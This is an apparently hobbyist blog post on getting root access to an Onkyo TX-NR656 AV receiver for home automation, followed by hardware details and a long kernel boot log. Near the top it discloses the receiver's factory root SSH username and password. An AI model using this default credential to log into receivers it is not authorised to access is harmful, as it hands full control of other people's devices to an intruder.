Onkyo TX-NR656 hacking
Onkyo TX-NR656
Recently bought a Onkyo TX-NR656 and obviously interested how I can integrate it in my Home Automation.Searching the internet I found this interesting link where it was clear the amplifier was running Linux and could be accessed with a serial connection.
Well... how much easier it seems now with my TX-NR656
ssh to your amp with putty or any other ssh client
logon with userid: root password: morimori
Some details:
Onkyo TX-NR656 System Details | |
---|---|
Main Chipset | TI AM335x ARM® Cortex®-A8-based core |
Wifi/BT chipset | RTL8821A 802.11ac, BT 4.0 |
Linux Version | Linux am335x-opt 3.19.0 #1 Mon Sep 12 12:10:29 JST 2016 armv7l GNU/Linux |
Memory Total | 249348 kB |
BusyBox details | BusyBox v1.22.1 (2015-08-07 20:03:25 JST) [, [[, addgroup, adduser, ar, ash, awk, basename, bunzip2, bzcat, cat, chattr, chgrp, chmod, chown, chroot, chvt, clear, cmp, cp, cpio, cut, date, dc, dd, deallocvt, delgroup, deluser, depmod, df, diff, dirname, dmesg, dnsdomainname, du, dumpkmap, dumpleases, echo, egrep, env, expr, false, fbset, fdisk, fgrep, find, flock, free, fsck, fstrim, fuser, getopt, getty, grep, groups, gunzip, gzip, halt, head, hexdump, hostname, hwclock, id, ifconfig, ifdown, ifup, insmod, ip, kill, killall, klogd, less, ln, loadfont, loadkmap, logger, logname, logread, losetup, ls, lsmod, md5sum, microcom, mkdir, mkfifo, mknod, mkswap, mktemp, modprobe, more, mount, mv, nc, netstat, nice, nohup, nslookup, od, openvt, patch, pidof, pivot_root, poweroff, printf, ps, pwd, rdate, readlink, realpath, reboot, renice, reset, rfkill, rm, rmdir, rmmod, route, run-parts, sed, seq, setconsole, sh, sha3sum, sleep, sort, start-stop-daemon, stat, strings, stty, sulogin, swapoff, swapon, switch_root, sync, sysctl, syslogd, tail, tar, tee, telnet, test, tftp, time, top, touch, tr, true, tty, udhcpc, udhcpd, umount, uname, uniq, unzip, uptime, users, usleep, vi, watch, wc, wget, which, who, whoami, xargs, yes, zcat |
Output dmesg:
root@am335x-opt:/media/settings# dmesg
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Linux version 3.19.0 (jenkins@fa0ca2275d27) (gcc version 4.8.2 (GCC) ) #1 Mon Sep 12 12:10:29 JST 2016
[ 0.000000] CPU: ARMv7 Processor [413fc082] revision 2 (ARMv7), cr=10c5387d
[ 0.000000] CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
[ 0.000000] Machine model: TI AM335x OPT Platform
[ 0.000000] cma: Reserved 24 MiB at 0x8e000000
[ 0.000000] Memory policy: Data cache writeback
[ 0.000000] On node 0 totalpages: 65280
[ 0.000000] free_area_init_node: node 0, pgdat c092029c, node_mem_map cfced000
[ 0.000000] Normal zone: 512 pages used for memmap
[ 0.000000] Normal zone: 0 pages reserved
[ 0.000000] Normal zone: 65280 pages, LIFO batch:15
[ 0.000000] CPU: All CPU(s) started in SVC mode.
[ 0.000000] AM335X ES2.1 (sgx neon )
[ 0.000000] pcpu-alloc: s0 r0 d32768 u32768 alloc=1*32768
[ 0.000000] pcpu-alloc: [0] 0
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 64768
[ 0.000000] Kernel command line: console=ttyO0,115200n8 root=ubi0:rootfs ubi.mtd=13,2048 rw noinitrd omap_wdt.timer_margin=300 omap_wdt.early_disable=0 quiet rootfstype=ubifs rootwait=1 mtdparts=omap2-nand.0:128k(mlo),128k(mlo2),128k(mlo3),128k(mlo4),1024k(u-boot),512k(u-boot-env),512k(constants),8192k(settings),5120k(kernel),5120k(kernel_2),512k(dts),512k(dts_2),120064k(rootfs),120064k(rootfs_2)
[ 0.000000] PID hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.000000] Dentry cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.000000] Inode-cache hash table entries: 16384 (order: 4, 65536 bytes)
[ 0.000000] Memory: 224424K/261120K available (6559K kernel code, 311K rwdata, 2096K rodata, 348K init, 234K bss, 12120K reserved, 24576K cma-reserved, 0K highmem)
[ 0.000000] Virtual kernel memory layout:
[ 0.000000] vector : 0xffff0000 - 0xffff1000 ( 4 kB)
[ 0.000000] fixmap : 0xffc00000 - 0xfff00000 (3072 kB)
[ 0.000000] vmalloc : 0xd0800000 - 0xff000000 ( 744 MB)
[ 0.000000] lowmem : 0xc0000000 - 0xd0000000 ( 256 MB)
[ 0.000000] pkmap : 0xbfe00000 - 0xc0000000 ( 2 MB)
[ 0.000000] modules : 0xbf000000 - 0xbfe00000 ( 14 MB)
[ 0.000000] .text : 0xc0008000 - 0xc087c064 (8657 kB)
[ 0.000000] .init : 0xc087d000 - 0xc08d4000 ( 348 kB)
[ 0.000000] .data : 0xc08d4000 - 0xc0921ed0 ( 312 kB)
[ 0.000000] .bss : 0xc0921ed0 - 0xc095c94c ( 235 kB)
[ 0.000000] NR_IRQS:16 nr_irqs:16 16
[ 0.000000] IRQ: Found an INTC at 0xfa200000 (revision 5.0) with 128 interrupts
[ 0.000000] OMAP clockevent source: timer2 at 24000000 Hz
[ 0.000014] sched_clock: 32 bits at 24MHz, resolution 41ns, wraps every 178956969942ns
[ 0.000033] OMAP clocksource: timer1 at 24000000 Hz
[ 0.000281] Console: colour dummy device 80x30
[ 0.000306] Calibrating delay loop... 795.44 BogoMIPS (lpj=3977216)
[ 0.089326] pid_max: default: 32768 minimum: 301
[ 0.089423] Security Framework initialized
[ 0.089480] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.089490] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.090165] CPU: Testing write buffer coherency: ok
[ 0.090510] Setting up static identity map for 0x8066d7c8 - 0x8066d820
[ 0.091454] devtmpfs: initialized
[ 0.092376] VFP support v0.3: implementor 41 architecture 3 part 30 variant c rev 3
[ 0.100516] omap_hwmod: tptc0 using broken dt data from edma
[ 0.100613] omap_hwmod: tptc1 using broken dt data from edma
[ 0.100718] omap_hwmod: tptc2 using broken dt data from edma
[ 0.104983] omap_hwmod: debugss: _wait_target_disable failed
[ 0.161840] pinctrl core: initialized pinctrl subsystem
[ 0.173454] NET: Registered protocol family 16
[ 0.175683] DMA: preallocated 256 KiB pool for atomic coherent allocations
[ 0.177733] cpuidle: using governor ladder
[ 0.177755] cpuidle: using governor menu
[ 0.183223] gpiochip_add: registered GPIOs 0 to 31 on device: gpio
[ 0.183404] OMAP GPIO hardware version 0.1
[ 0.184054] gpiochip_add: registered GPIOs 32 to 63 on device: gpio
[ 0.185597] gpiochip_add: registered GPIOs 64 to 95 on device: gpio
[ 0.186362] gpiochip_add: registered GPIOs 96 to 127 on device: gpio
[ 0.194206] omap-gpmc 50000000.gpmc: could not find pctldev for node /pinmux@44e10800/gpmc_pins_default, deferring probe
[ 0.194240] platform 50000000.gpmc: Driver omap-gpmc requests probe deferral
[ 0.198037] No ATAGs?
[ 0.198070] hw-breakpoint: debug architecture 0x4 unsupported.
[ 0.237644] edma-dma-engine edma-dma-engine.0: TI EDMA DMA engine driver
[ 0.238315] of_get_named_gpiod_flags: can't parse 'gpio' property of node '/fixedregulator@0[0]'
[ 0.238665] of_get_named_gpiod_flags: can't parse 'gpio' property of node '/fixedregulator@1[0]'
[ 0.243222] vgaarb: loaded
[ 0.244078] SCSI subsystem initialized
[ 0.244880] libata version 3.00 loaded.
[ 0.245444] usbcore: registered new interface driver usbfs
[ 0.245568] usbcore: registered new interface driver hub
[ 0.245647] usbcore: registered new device driver usb
[ 0.246362] omap_i2c 44e0b000.i2c: could not find pctldev for node /pinmux@44e10800/i2c_0_pins_default, deferring probe
[ 0.246391] platform 44e0b000.i2c: Driver omap_i2c requests probe deferral
[ 0.246426] omap_i2c 4819c000.i2c: could not find pctldev for node /pinmux@44e10800/i2c_2_pins_default, deferring probe
[ 0.246441] platform 4819c000.i2c: Driver omap_i2c requests probe deferral
[ 0.246712] pps_core: LinuxPPS API ver. 1 registered
[ 0.246723] pps_core: Software ver. 5.3.6 - Copyright 2005-2007 Rodolfo Giometti <giometti@linux.it>
[ 0.246796] PTP clock support registered
[ 0.247880] omap-mailbox 480c8000.mailbox: omap mailbox rev 0x400
[ 0.249864] Advanced Linux Sound Architecture Driver Initialized.
[ 0.250629] Bluetooth: Core ver 2.20
[ 0.250704] NET: Registered protocol family 31
[ 0.250712] Bluetooth: HCI device and connection manager initialized
[ 0.250774] Bluetooth: HCI socket layer initialized
[ 0.250788] Bluetooth: L2CAP socket layer initialized
[ 0.250834] Bluetooth: SCO socket layer initialized
[ 0.251281] cfg80211: Calling CRDA to update world regulatory domain
[ 0.252490] Switched to clocksource timer1
[ 0.269704] NET: Registered protocol family 2
[ 0.271593] TCP established hash table entries: 2048 (order: 1, 8192 bytes)
[ 0.271630] TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
[ 0.271658] TCP: Hash tables configured (established 2048 bind 2048)
[ 0.271721] TCP: reno registered
[ 0.271732] UDP hash table entries: 256 (order: 0, 4096 bytes)
[ 0.271750] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[ 0.271916] NET: Registered protocol family 1
[ 0.272221] RPC: Registered named UNIX socket transport module.
[ 0.272232] RPC: Registered udp transport module.
[ 0.272238] RPC: Registered tcp transport module.
[ 0.272244] RPC: Registered tcp NFSv4.1 backchannel transport module.
[ 0.272268] PCI: CLS 0 bytes, default 64
[ 0.273462] hw perfevents: enabled with armv7_cortex_a8 PMU driver, 5 counters available
[ 0.275831] futex hash table entries: 256 (order: -1, 3072 bytes)
[ 0.278078] VFS: Disk quotas dquot_6.5.2
[ 0.278149] VFS: Dquot-cache hash table entries: 1024 (order 0, 4096 bytes)
[ 0.278759] NFS: Registering the id_resolver key type
[ 0.278831] Key type id_resolver registered
[ 0.278839] Key type id_legacy registered
[ 0.278913] ntfs: driver 2.1.31 [Flags: R/O].
[ 0.278953] jffs2: version 2.2. (NAND) (SUMMARY) © 2001-2006 Red Hat, Inc.
[ 0.280639] NET: Registered protocol family 38
[ 0.280704] io scheduler noop registered
[ 0.280718] io scheduler deadline registered
[ 0.280745] io scheduler cfq registered (default)
[ 0.281916] pinctrl-single 44e10800.pinmux: 142 pins at pa f9e10800 size 568
[ 0.283740] platform 44e11324.wkup_m3_ipc: Driver wkup_m3_ipc requests probe deferral
[ 0.286325] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
[ 0.289295] omap_uart 44e09000.serial: no wakeirq for uart0
[ 0.289323] of_get_named_gpiod_flags: can't parse 'rts-gpio' property of node '/ocp/serial@44e09000[0]'
[ 0.289495] 44e09000.serial: ttyO0 at MMIO 0x44e09000 (irq = 154, base_baud = 3000000) is a OMAP UART0
[ 0.289932] console [ttyO0] enabled
[ 0.290959] omap_uart 48022000.serial: no wakeirq for uart0
[ 0.290982] of_get_named_gpiod_flags: can't parse 'rts-gpio' property of node '/ocp/serial@48022000[0]'
[ 0.291118] 48022000.serial: ttyO1 at MMIO 0x48022000 (irq = 155, base_baud = 3000000) is a OMAP UART1
[ 0.292421] omap_rng 48310000.rng: OMAP Random Number Generator ver. 20
[ 0.292755] [drm] Initialized drm 1.1.0 20060810
[ 0.293571] panel panel: GPIO lookup for consumer enable
[ 0.293587] panel panel: using device tree for GPIO lookup
[ 0.293600] of_get_named_gpiod_flags: can't parse 'enable-gpios' property of node '/panel[0]'
[ 0.293610] of_get_named_gpiod_flags: can't parse 'enable-gpio' property of node '/panel[0]'
[ 0.293619] panel panel: using lookup tables for GPIO lookup
[ 0.293629] panel panel: lookup for GPIO enable failed
[ 0.295862] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[ 0.295878] [drm] No driver support for vblank timestamp query.
[ 0.299869] dpll_disp_ck: target rate is overrided to 891000000
[ 0.340222] Console: switching to colour frame buffer device 160x45
[ 0.347023] tilcdc 4830e000.lcdc: fb0: frame buffer device
[ 0.347034] tilcdc 4830e000.lcdc: registered panic notifier
[ 0.347055] [drm] Initialized tilcdc 1.0.0 20121205 on minor 0
[ 0.357467] brd: module loaded
[ 0.362636] loop: module loaded
[ 0.365756] mtdoops: mtd device (mtddev=name/number) must be supplied
[ 0.373994] of_get_named_gpiod_flags: can't parse 'cs-gpios' property of node '/ocp/spi@481a0000[0]'
[ 0.374053] of_get_named_gpiod_flags: parsed 'cs-gpios' property of node '/ocp/spi@481a0000[1]' - status (0)
[ 0.374168] of_get_named_gpiod_flags: can't parse 'cs-gpios' property of node '/ocp/spi@481a0000[0]'
[ 0.374189] of_get_named_gpiod_flags: parsed 'cs-gpios' property of node '/ocp/spi@481a0000[1]' - status (0)
[ 0.378614] usbcore: registered new interface driver asix
[ 0.378715] usbcore: registered new interface driver ax88179_178a
[ 0.378783] usbcore: registered new interface driver cdc_ether
[ 0.378861] usbcore: registered new interface driver smsc95xx
[ 0.378920] usbcore: registered new interface driver net1080
[ 0.378979] usbcore: registered new interface driver cdc_subset
[ 0.379037] usbcore: registered new interface driver zaurus
[ 0.379159] usbcore: registered new interface driver cdc_ncm
[ 0.380444] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 0.380468] ehci-pci: EHCI PCI platform driver
[ 0.380624] ehci-omap: OMAP-EHCI Host Controller driver
[ 0.381005] usbcore: registered new interface driver cdc_wdm
[ 0.381150] usbcore: registered new interface driver usb-storage
[ 0.385978] of_get_named_gpiod_flags: can't parse 'reset-gpios' property of node '/ocp/usb@47400000/usb-phy@47401300[0]'
[ 0.386050] 47401300.usb-phy supply vcc not found, using dummy regulator
[ 0.388614] musb-hdrc musb-hdrc.0.auto: Failed to request rx1.
[ 0.395092] musb-hdrc musb-hdrc.0.auto: musb_init_controller failed with status -517
[ 0.403240] platform musb-hdrc.0.auto: Driver musb-hdrc requests probe deferral
[ 0.403937] of_get_named_gpiod_flags: can't parse 'reset-gpios' property of node '/ocp/usb@47400000/usb-phy@47401b00[0]'
[ 0.403989] 47401b00.usb-phy supply vcc not found, using dummy regulator
[ 0.406325] musb-hdrc musb-hdrc.1.auto: Failed to request rx1.
[ 0.412817] musb-hdrc musb-hdrc.1.auto: musb_init_controller failed with status -517
[ 0.420925] platform musb-hdrc.1.auto: Driver musb-hdrc requests probe deferral
[ 0.434212] mousedev: PS/2 mouse device common for all mice
[ 0.436302] omap_rtc 44e3e000.rtc: already running
[ 0.436760] omap_rtc 44e3e000.rtc: rtc core: registered 44e3e000.rtc as rtc0
[ 0.437402] i2c /dev entries driver
[ 0.437502] Driver for 1-wire Dallas network protocol.
[ 0.439310] omap_wdt: Watchdog already running. Resetting timeout to 300 sec
[ 0.441012] omap_wdt: OMAP Watchdog Timer Rev 0x01: initial timeout 300 sec
[ 0.441682] Driver 'mmcblk' needs updating - please use bus_type methods
[ 0.442311] of_get_named_gpiod_flags: can't parse 'cd-gpios' property of node '/ocp/mmc@48060000[0]'
[ 0.442326] of_get_named_gpiod_flags: can't parse 'wp-gpios' property of node '/ocp/mmc@48060000[0]'
[ 0.442790] omap_hsmmc 48060000.mmc: unable to get vmmc regulator -517
[ 0.449769] platform 48060000.mmc: Driver omap_hsmmc requests probe deferral
[ 0.449916] of_get_named_gpiod_flags: parsed 'cd-gpios' property of node '/ocp/mmc@481d8000[0]' - status (0)
[ 0.449939] of_get_named_gpiod_flags: parsed 'wp-gpios' property of node '/ocp/mmc@481d8000[0]' - status (0)
[ 0.484143] of_get_named_gpiod_flags: parsed 'gpios' property of node '/leds/led@0[0]' - status (0)
[ 0.484446] ledtrig-cpu: registered to indicate activity on CPUs
[ 0.484762] omap-aes 53500000.aes: OMAP AES hw accel rev: 3.2
[ 0.486220] omap-sham 53100000.sham: hw accel on OMAP rev 4.3
[ 0.487456] usbcore: registered new interface driver usbhid
[ 0.487469] usbhid: USB HID core driver
[ 0.487763] remoteproc0: wkup_m3 is available
[ 0.487774] remoteproc0: Note: remoteproc is still under development and considered experimental.
[ 0.487781] remoteproc0: THE BINARY FORMAT IS NOT YET FINALIZED, and backward compatibility isn't yet guaranteed.
[ 0.489043] remoteproc0: Direct firmware load for am335x-pm-firmware.elf failed with error -2
[ 0.489060] remoteproc0: Falling back to user helper
[ 0.490999] oprofile: using arm/armv7
[ 0.491348] TCP: cubic registered
[ 0.491361] Initializing XFRM netlink socket
[ 0.491386] NET: Registered protocol family 17
[ 0.491429] NET: Registered protocol family 15
[ 0.491925] Key type dns_resolver registered
[ 0.492249] omap_voltage_late_init: Voltage driver support not added
[ 0.500814] platform cpufreq-dt.0: Driver cpufreq-dt requests probe deferral
[ 0.501230] ThumbEE CPU extension supported.
[ 0.501266] Registering SWP/SWPB emulation handler
[ 0.504330] omap-gpmc 50000000.gpmc: GPMC revision 6.0
[ 0.505179] nand: device found, Manufacturer ID: 0x98, Chip ID: 0xda
[ 0.505194] nand: Toshiba NAND 256MiB 3,3V 8-bit
[ 0.505203] nand: 256 MiB, SLC, erase size: 128 KiB, page size: 2048, OOB size: 128
[ 0.505236] nand: using OMAP_ECC_BCH8_CODE_HW ECC scheme
[ 0.505300] 14 cmdlinepart partitions found on MTD device omap2-nand.0
[ 0.505309] Creating 14 MTD partitions on "omap2-nand.0":
[ 0.505323] 0x000000000000-0x000000020000 : "mlo"
[ 0.506625] 0x000000020000-0x000000040000 : "mlo2"
[ 0.507640] 0x000000040000-0x000000060000 : "mlo3"
[ 0.508658] 0x000000060000-0x000000080000 : "mlo4"
[ 0.510040] 0x000000080000-0x000000180000 : "u-boot"
[ 0.513114] 0x000000180000-0x000000200000 : "u-boot-env"
[ 0.514558] 0x000000200000-0x000000280000 : "constants"
[ 0.516523] 0x000000280000-0x000000a80000 : "settings"
[ 0.524357] 0x000000a80000-0x000000f80000 : "kernel"
[ 0.529707] 0x000000f80000-0x000001480000 : "kernel_2"
[ 0.535126] 0x000001480000-0x000001500000 : "dts"
[ 0.536653] 0x000001500000-0x000001580000 : "dts_2"
[ 0.538621] 0x000001580000-0x000008ac0000 : "rootfs"
[ 0.635861] 0x000008ac0000-0x000010000000 : "rootfs_2"
[ 0.752738] tps65910 2-002d: No interrupt support, no core IRQ
[ 0.757123] vrtc: supplied by vbat
[ 0.758837] vio: supplied by vbat
[ 0.760656] vdd_mpu: supplied by vbat
[ 0.762466] vdd_core: supplied by vbat
[ 0.765231] vdig1: supplied by vbat
[ 0.766608] vdig2: supplied by vbat
[ 0.767994] vpll: supplied by vbat
[ 0.769376] vdac: supplied by vbat
[ 0.770753] vaux1: supplied by vbat
[ 0.772136] vaux2: supplied by vbat
[ 0.773538] vaux33: supplied by vbat
[ 0.774932] vmmc: supplied by vbat
[ 0.776225] vbb: supplied by vbat
[ 0.776914] omap_i2c 44e0b000.i2c: bus 2 rev0.11 at 400 kHz
[ 0.778112] omap_i2c 4819c000.i2c: bus 0 rev0.11 at 100 kHz
[ 0.785515] musb-hdrc: ConfigData=0xde (UTMI-8, dyn FIFOs, bulk combine, bulk split, HB-ISO Rx, HB-ISO Tx, SoftConn)
[ 0.785536] musb-hdrc: MHDRC RTL version 2.0
[ 0.785544] musb-hdrc: setup fifo_mode 4
[ 0.785563] musb-hdrc: 28/31 max ep, 16384/16384 memory
[ 0.785701] musb-hdrc musb-hdrc.0.auto: MUSB HDRC host driver
[ 0.786085] musb-hdrc musb-hdrc.0.auto: new USB bus registered, assigned bus number 1
[ 0.786278] usb usb1: New USB device found, idVendor=1d6b, idProduct=0002
[ 0.786292] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 0.786303] usb usb1: Product: MUSB HDRC host driver
[ 0.786312] usb usb1: Manufacturer: Linux 3.19.0 musb-hcd
[ 0.786322] usb usb1: SerialNumber: musb-hdrc.0.auto
[ 0.787129] hub 1-0:1.0: USB hub found
[ 0.787176] hub 1-0:1.0: 1 port detected
[ 0.794495] musb-hdrc: ConfigData=0xde (UTMI-8, dyn FIFOs, bulk combine, bulk split, HB-ISO Rx, HB-ISO Tx, SoftConn)
[ 0.794514] musb-hdrc: MHDRC RTL version 2.0
[ 0.794522] musb-hdrc: setup fifo_mode 4
[ 0.794539] musb-hdrc: 28/31 max ep, 16384/16384 memory
[ 0.794664] musb-hdrc musb-hdrc.1.auto: MUSB HDRC host driver
[ 0.795025] musb-hdrc musb-hdrc.1.auto: new USB bus registered, assigned bus number 2
[ 0.795203] usb usb2: New USB device found, idVendor=1d6b, idProduct=0002
[ 0.795215] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 0.795225] usb usb2: Product: MUSB HDRC host driver
[ 0.795234] usb usb2: Manufacturer: Linux 3.19.0 musb-hcd
[ 0.795243] usb usb2: SerialNumber: musb-hdrc.1.auto
[ 0.796025] hub 2-0:1.0: USB hub found
[ 0.796067] hub 2-0:1.0: 1 port detected
[ 0.796985] of_get_named_gpiod_flags: can't parse 'cd-gpios' property of node '/ocp/mmc@48060000[0]'
[ 0.797003] of_get_named_gpiod_flags: can't parse 'wp-gpios' property of node '/ocp/mmc@48060000[0]'
[ 0.834821] UBI-0: ubi_attach_mtd_dev:attaching mtd13 to ubi0
[ 1.277274] UBI-0: scan_all:scanning is finished
[ 1.282942] UBI-0 warning: print_rsvd_warning: cannot reserve enough PEBs for bad PEB handling, reserved 7, need 38
[ 1.283957] UBI-0: ubi_attach_mtd_dev:attached mtd13 (name "rootfs_2", size 117 MiB)
[ 1.283974] UBI-0: ubi_attach_mtd_dev:PEB size: 131072 bytes (128 KiB), LEB size: 126976 bytes
[ 1.283983] UBI-0: ubi_attach_mtd_dev:min./max. I/O unit sizes: 2048/2048, sub-page size 512
[ 1.283992] UBI-0: ubi_attach_mtd_dev:VID header offset: 2048 (aligned 2048), data offset: 4096
[ 1.284000] UBI-0: ubi_attach_mtd_dev:good PEBs: 936, bad PEBs: 2, corrupted PEBs: 0
[ 1.284009] UBI-0: ubi_attach_mtd_dev:user volume: 1, internal volumes: 1, max. volumes count: 128
[ 1.284021] UBI-0: ubi_attach_mtd_dev:max/mean erase counter: 2/0, WL threshold: 4096, image sequence number: 1702941044
[ 1.284029] UBI-0: ubi_attach_mtd_dev:available PEBs: 0, total reserved PEBs: 936, PEBs reserved for bad PEB handling: 7
[ 1.298756] UBI-0: ubi_thread:background thread "ubi_bgt0d" started, PID 966
[ 1.342553] davinci_mdio 4a101000.mdio: davinci mdio revision 1.6
[ 1.342573] davinci_mdio 4a101000.mdio: detected phy mask fffffffd
[ 1.343251] libphy: 4a101000.mdio: probed
[ 1.343270] davinci_mdio 4a101000.mdio: phy[1]: device 4a101000.mdio:01, driver Micrel KSZ8081 or KSZ8091
[ 1.344022] cpsw 4a100000.ethernet: Detected MACID = 00:09:b0:e0:09:a8
[ 1.345286] of_get_named_gpiod_flags: parsed 'gpios' property of node '/wakeup_keys@0/switch@0[0]' - status (0)
[ 1.345322] of_get_named_gpiod_flags: parsed 'gpios' property of node '/wakeup_keys@0/switch@1[0]' - status (0)
[ 1.345345] of_get_named_gpiod_flags: parsed 'gpios' property of node '/wakeup_keys@0/switch@2[0]' - status (0)
[ 1.345366] of_get_named_gpiod_flags: parsed 'gpios' property of node '/wakeup_keys@0/switch@3[0]' - status (0)
[ 1.345966] input: wakeup_keys@0 as /devices/platform/wakeup_keys@0/input/input0
[ 1.346786] omap_rtc 44e3e000.rtc: setting system clock to 2016-11-28 22:44:17 UTC (1480373057)
[ 1.351338] ALSA device list:
[ 1.351359] No soundcards found.
[ 1.364289] UBIFS: background thread "ubifs_bgt0_0" started, PID 980
[ 1.376772] UBIFS: recovery needed
[ 1.461370] UBIFS: recovery completed
[ 1.461491] UBIFS: mounted UBI device 0, volume 0, name "rootfs"
[ 1.461504] UBIFS: LEB size: 126976 bytes (124 KiB), min./max. I/O unit sizes: 2048 bytes/2048 bytes
[ 1.461516] UBIFS: FS size: 116056064 bytes (110 MiB, 914 LEBs), journal size 9023488 bytes (8 MiB, 72 LEBs)
[ 1.461524] UBIFS: reserved for root: 0 bytes (0 KiB)
[ 1.461538] UBIFS: media format: w4/r0 (latest is w4/r0), UUID 7C067DE2-073B-404A-B0E9-9FD30313BFB7, small LPT model
[ 1.461841] VFS: Mounted root (ubifs filesystem) on device 0:15.
[ 1.462557] devtmpfs: mounted
[ 1.463009] Freeing unused kernel memory: 348K (c087d000 - c08d4000)
[ 1.984072] udevd[1012]: starting version 182
[ 2.371268] multi-ch dummy codec ...
[ 2.422690] input/output dummy codec ...
[ 2.467567] remoteproc0: powering up wkup_m3
[ 2.468311] remoteproc0: Booting fw image am335x-pm-firmware.elf, size 154420
[ 2.468578] remoteproc0: remote processor wkup_m3 is now up
[ 2.468617] wkup_m3_ipc 44e11324.wkup_m3_ipc: CM3 Firmware Version = 0x190
[ 3.176881] random: dd urandom read with 9 bits of entropy available
[ 3.493026] davinci_evm sound@0: multi-dmmy-hifi <-> 48038000.mcasp mapping ok
[ 3.513304] davinci_evm sound@1: inout-async-hifi <-> 4803c000.mcasp mapping ok
[ 6.024101] UBI-1: ubi_attach_mtd_dev:attaching mtd7 to ubi1
[ 6.054202] UBI-1: scan_all:scanning is finished
[ 6.064126] UBI-1: ubi_attach_mtd_dev:attached mtd7 (name "settings", size 8 MiB)
[ 6.064150] UBI-1: ubi_attach_mtd_dev:PEB size: 131072 bytes (128 KiB), LEB size: 126976 bytes
[ 6.064159] UBI-1: ubi_attach_mtd_dev:min./max. I/O unit sizes: 2048/2048, sub-page size 512
[ 6.064168] UBI-1: ubi_attach_mtd_dev:VID header offset: 2048 (aligned 2048), data offset: 4096
[ 6.064177] UBI-1: ubi_attach_mtd_dev:good PEBs: 64, bad PEBs: 0, corrupted PEBs: 0
[ 6.064185] UBI-1: ubi_attach_mtd_dev:user volume: 1, internal volumes: 1, max. volumes count: 128
[ 6.064197] UBI-1: ubi_attach_mtd_dev:max/mean erase counter: 4/2, WL threshold: 4096, image sequence number: 956809106
[ 6.064206] UBI-1: ubi_attach_mtd_dev:available PEBs: 0, total reserved PEBs: 64, PEBs reserved for bad PEB handling: 40
[ 6.066966] UBI-1: ubi_thread:background thread "ubi_bgt1d" started, PID 1789
[ 6.105382] UBIFS: background thread "ubifs_bgt1_0" started, PID 1794
[ 6.117849] UBIFS: recovery needed
[ 6.258440] UBIFS: recovery completed
[ 6.258553] UBIFS: mounted UBI device 1, volume 0, name "nsdk-settings"
[ 6.258564] UBIFS: LEB size: 126976 bytes (124 KiB), min./max. I/O unit sizes: 2048 bytes/2048 bytes
[ 6.258575] UBIFS: FS size: 1396736 bytes (1 MiB, 11 LEBs), journal size 888833 bytes (0 MiB, 5 LEBs)
[ 6.258583] UBIFS: reserved for root: 65970 bytes (64 KiB)
[ 6.258597] UBIFS: media format: w4/r0 (latest is w4/r0), UUID 56505C22-AC24-47BE-B7CA-0F20F0028825, small LPT model
[ 6.712551] dpll_disp_ck is checked as rate[148500000]*6
[ 7.410281] RTL871X: module init start
[ 7.410314] RTL871X: rtl8821as v4.3.24_15589.20151030_BTCOEX20150921-58_beta
[ 7.410324] RTL871X: build time: Sep 12 2016 12:10:46
[ 7.410331] RTL871X: rtl8821as BT-Coex version = BTCOEX20150921-58
[ 7.410342] call drivers/net/wireless/rtl8821AS/platform/platform_TI_AM335X_sdio.c platform_wifi_power_on
[ 7.431177] RTL871X: module init ret=0
[ 7.433709] MMC: rescanning...
[ 7.677082] skip mmc_select_voltage() for H/W anormaly:ocr=0x90ff0000vs0x80
[ 7.687883] mmc1: new high speed SDIO card at address 0001
[ 7.691317] RTL871X: CHIP TYPE: RTL8821A
[ 7.693258] RTL871X: read_chip_version_8812a SYS_CFG(0xF0)=0x04412131
[ 7.693370] RTL871X: rtw_hal_config_rftype RF_Type is 3 TotalTxPath is 1
[ 7.693387] RTL871X: Chip Version Info: CHIP_8821_Normal_Chip_TSMC_C_CUT_1T1R_RomVer(0)
[ 7.699630] RTL871X: SetHwReg8812A: bMacPwrCtrlOn=1
[ 7.699895] RTL871X: EEPROM type is E-FUSE
[ 7.699933] RTL871X: CheckAutoloadState8812A: 9346CR(0xa)=0x20, Boot from EFUSE, Autoload OK!
[ 7.699942] RTL871X: +_ParsePROMContent
[ 7.735098] RTL871X: EEPROM ID=0x8129
[ 7.735165] RTL871X: EEPROMRegulatory = 0x1
[ 7.735173] RTL871X: Board Type: 0x 1
[ 7.735190] RTL871X: hal_com_config_channel_plan chplan:0x20
[ 7.735197] RTL871X: CrystalCap: 0x30
[ 7.735204] RTL871X: ThermalMeter = 0x1b
[ 7.735213] RTL871X: SWAS: bHwAntDiv = 1, TRxAntDivType = ff
[ 7.735224] RTL871X: pHalData->PAType_2G is 0x0, pHalData->ExternalPA_2G = 0
[ 7.735231] RTL871X: pHalData->PAType_5G is 0x0, pHalData->ExternalPA_5G = 0
[ 7.735238] RTL871X: pHalData->LNAType_2G is 0x0, pHalData->ExternalLNA_2G = 0
[ 7.735245] RTL871X: pHalData->LNAType_5G is 0x0, pHalData->ExternalLNA_5G = 0
[ 7.735328] RTL871X: Hal_EfuseParseBTCoexistInfo8812A: BTCoexist=Enable, AntNum=2
[ 7.735337] RTL871X: -_ParsePROMContent
[ 7.735736] RTL871X: SetHwReg8812A: bMacPwrCtrlOn=0
[ 7.736178] RTL871X: SetHwReg8812A: bMacPwrCtrlOn=0
[ 7.736189] RTL871X: rtw_hal_read_chip_info in 40 ms
[ 7.736408] RTL871X: init_channel_set((null)) ChannelPlan ID:0x20, ch num:13
[ 7.737247] RTL871X: rtw_alloc_macid((null)) if1, hwaddr:ff:ff:ff:ff:ff:ff macid:1
[ 7.737400] RTL871X: default power by rate loaded
[ 7.738604] RTL871X: default power limit loaded
[ 7.739356] RTL871X: rtw_macaddr_cfg mac addr:00:09:b0:b5:c7:b5
[ 7.744207] RTL871X: bDriverStopped:True, bSurpriseRemoved:False, bup:0, hw_init_completed:0
